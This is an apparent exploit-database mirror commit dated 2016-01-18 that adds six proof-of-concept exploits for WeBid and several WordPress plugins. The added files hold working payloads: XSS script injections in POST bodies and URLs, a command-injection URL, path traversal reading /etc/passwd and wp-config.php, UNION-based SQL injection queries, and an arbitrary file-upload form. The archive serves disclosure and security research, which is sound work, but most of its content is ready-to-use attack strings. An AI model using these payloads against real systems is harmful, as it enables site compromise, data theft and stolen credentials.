bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-01-18

Browse source 
6 new exploits
This commit is contained in:
Offensive Security 2016-01-18 05:02:50 +00:00
parent 9e71d66c7f
commit 7f341adc84
7 changed files with 137 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
files.csv
View file

@ -33712,6 +33712,7 @@ id,file,description,date,author,platform,type,port
37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
37816,platforms/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps,0
37815,platforms/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",php,webapps,80
39249,platforms/php/webapps/39249.txt,"WeBid Multiple Cross Site Scripting And LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0
37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0
37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0
37440,platforms/php/webapps/37440.txt,"Watchguard XCS <= 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0
@ -35494,3 +35495,8 @@ id,file,description,date,author,platform,type,port
39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Path Traversal Vulnerability",2016-01-15,"High-Tech Bridge SA",php,webapps,80
39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection Vulnerability",2016-01-15,"High-Tech Bridge SA",php,webapps,80
39248,platforms/php/webapps/39248.txt,"WordPress BSK PDF Manager Plugin 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0
39250,platforms/php/webapps/39250.txt,"WordPress DZS-VideoGallery Plugin Cross Site Scripting and Command Injection Vulnerabilities",2014-07-13,MustLive,php,webapps,0
39251,platforms/php/webapps/39251.txt,"WordPress BookX Plugin 'includes/bookx_export.php' Local File Include Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
39252,platforms/php/webapps/39252.txt,"WordPress WP Rss Poster Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
39253,platforms/php/webapps/39253.txt,"WordPress ENL Newsletter Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
39254,platforms/php/webapps/39254.html,"WordPress CopySafe PDF Protection Plugin Arbitrary File Upload Vulnerability",2014-07-14,"Jagriti Sahu",php,webapps,0

Can't render this file because it is too large.

68
platforms/php/webapps/39249.txt Executable file
View file

@ -0,0 +1,68 @@
source: http://www.securityfocus.com/bid/68519/info
WeBid is prone to multiple cross-site-scripting vulnerabilities and an LDAP injection vulnerability.
An attacker may leverage these issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WeBid 1.1.1 is vulnerable; other versions may also be affected.
1. http://www.example.com/WeBid/register.php
Reflected Cross-Site Scripting in the parameters are :
"TPL_name="
"TPL_nick="
"TPL_email"
"TPL_year"
"TPL_address"
"TPL_city"
"TPL_prov"
"TPL_zip"
"TPL_phone"
"TPL_pp_email"
"TPL_authnet_id"
"TPL_authnet_pass"
"TPL_wordpay_id"
"TPL_toocheckout_id"
"TPL_moneybookers_email"
PoC :
we can run our xss script with all these different parameters
Host=www.example.com
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://www.example.com/web-id/register.php
Cookie=WEBID_ONLINE=57e5a8970c4a9df8850c130e44e49160; PHPSESSID=2g18aupihsotkmka8778utvk47
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=417
POSTDATA=csrftoken=&TPL_name="><script>alert('Hacked By Govind Singh aka NullPort');</script>&TPL_nick=&TPL_password=&TPL_repeat_password=&TPL_email=&TPL_day=&TPL_month=00&TPL_year=&TPL_address=&TPL_city=&TPL_prov=&TPL_country=United+Kingdom&TPL_zip=&TPL_phone=&TPL_timezone=0&TPL_nletter=1&TPL_pp_email=&TPL_authnet_id=&TPL_authnet_pass=&TPL_worldpay_id=&TPL_toocheckout_id=&TPL_moneybookers_email=&captcha_code=&action=first
----------------------------------------------------------------------------------------------------------------
2. http://www.example.com/WeBid/user_login.php
Reflected Cross-Site Scripting in the parameter is :
"username"
Host=www.example.com
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://www.example.com/web-id/user_login.php
Cookie=WEBID_ONLINE=e54c2acd05a02315f39ddb4d3a112c1e; PHPSESSID=2g18aupihsotkmka8778utvk47
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=96
POSTDATA=username="><script>alert('xss PoC By Govind Singh');</script>&password=&input=Login&action=login
==================================================================================================================
2. LDAP Injection
PoC :
http://www.example.com/WeBid/loader.php?js=[LDAP]
http://www.example.com/WeBid/loader.php?js=js/jquery.js;js/jquery.lightbox.js;
PoC
http://www.example.com/WeBid/viewhelp.php?cat=[LDAP]
Replace cat= as 1,2,3,4

17
platforms/php/webapps/39250.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/68525/info
WordPress DZS-VideoGallery plugin is prone to multiple cross site scripting vulnerabilities and a command-injection vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to execute arbitrary OS commands. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
DZS-VideoGallery 7.85 is vulnerable; prior versions are also affected.
Cross-site-scripting:
http://www.example.com/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Command-Injection:
http://www.example.com/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://www.example.com/1.jpg$(os-cmd)

11
platforms/php/webapps/39251.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/68556/info
BookX plugin for WordPress is prone to a local file-include vulnerability because it fails to adequately validate user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information; other attacks are also possible.
BookX plugin 1.7 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/bookx/includes/bookx_export.php?file=../../../../../../../../etc/passwd
http://www.example.com/wp-content/plugins/bookx/includes/bookx_export.php?file=../../../../wp-config.php

9
platforms/php/webapps/39252.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/68557/info
WP Rss Poster plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WP Rss Poster 1.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=wrp-add-new&id=2 union select 1,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18

9
platforms/php/webapps/39253.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/68558/info
ENL Newsletter plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ENL Newsletter 1.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=enl-add-new&id=2 union select 1,@@version,3,user(),database(),6,7,8,9,0,1

17
platforms/php/webapps/39254.html Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/68656/info
The CopySafe PDF Protection plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
CopySafe PDF Protection 0.6 and prior are vulnerable.
<form
action="http://www.example.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="wpcsp_file" ><br>
<input type=text name="upload_path" value="../../../../uploads/">
<input type="submit" name="submit" value="Submit">
</form>